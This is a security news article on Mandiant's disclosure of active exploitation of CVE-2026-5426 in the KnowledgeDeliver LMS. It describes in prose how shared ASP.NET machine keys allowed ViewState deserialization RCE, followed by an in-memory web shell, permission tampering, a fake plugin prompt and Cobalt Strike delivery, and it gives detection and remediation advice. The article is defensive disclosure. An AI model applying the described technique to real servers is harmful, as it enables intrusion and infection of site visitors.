Mandiant Uncovers Active Exploitation of KnowledgeDeliver ViewState Deserialization Flaw (CVE-2026-5426)
Mandiant reports active exploitation of a critical ViewState deserialization vulnerability in KnowledgeDeliver, a Japanese LMS, allowing unauthenticated remote code execution via hardcoded ASP.NET machine keys.
Mandiant has disclosed active exploitation of a critical vulnerability in KnowledgeDeliver, a Learning Management System (LMS) developed by Digital Knowledge and widely used in Japan. The flaw, now tracked as CVE-2026-5426, allows unauthenticated remote code execution through ASP.NET ViewState deserialization, stemming from the use of identical pre-shared machine keys across multiple customer deployments. Mandiant responded to an incident in late 2025 involving a compromised web server running KnowledgeDeliver, where an unknown threat actor leveraged this zero-day to inject malicious code and infect site visitors.
The vulnerability originates from a standardized web.config file provided by the vendor before February 24, 2026, which contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign ViewState payloads. Because these keys were identical across independent customer environments, any threat actor who obtained the keys from one deployment could compromise any other internet-facing KnowledgeDeliver instance. By crafting a malicious ViewState payload and sending it via the __VIEWSTATE parameter in an HTTP request, the attacker could force the server to deserialize it, achieving remote code execution. This technique mirrors previous ViewState deserialization attacks against Sitecore and other ASP.NET applications.
Once access was established, the threat actor deployed a .NET-based in-memory web shell called BLUEBEAM (also known as Godzilla), which operates entirely within the IIS worker process (w3wp.exe), evading traditional file-based detection. The actor then executed commands to escalate control over the file system, modifying permissions with icacls to grant "Everyone" full access to the web application directory. They also tampered with a JavaScript file to display a fake security alert prompting users to install a "security authentication plugin," which silently loaded a remote malicious script from a threat actor-controlled domain.
The remote script convinced users to download a fake installer, leading to infection with a Cobalt Strike BEACON backdoor. The payload was encrypted using a key derived from the compromised organization's name, indicating the threat actor prepared the payload specifically for the targeted organization. Mandiant noted that the use of BLUEBEAM is consistent with previous Microsoft reporting on similar attacks.
Mandiant has provided detailed hunting guidance for organizations. Key indicators include Windows Application Event ID 1316 from ASP.NET 4.0.30319.0, where "Viewstate verification failed" with reason "Viewstate was invalid" may indicate successful deserialization. Suspicious child processes spawned by w3wp.exe, such as cmd.exe or powershell.exe, should be investigated. File integrity monitoring should focus on unauthorized changes to .js, .aspx, or .config files, particularly the addition of remote script loaders. Anomalous User-Agent strings consisting of two distinct identifiers concatenated together have also been observed.
Remediation requires immediately rotating machine keys to generate unique, cryptographically random values for each deployment. Organizations should also apply any patches released by Digital Knowledge, monitor for the indicators described above, and review their ASP.NET configurations to ensure machine keys are not shared across environments. This incident underscores the critical importance of keeping machine keys unique and secure, as their exposure can lead to widespread compromise across multiple deployments.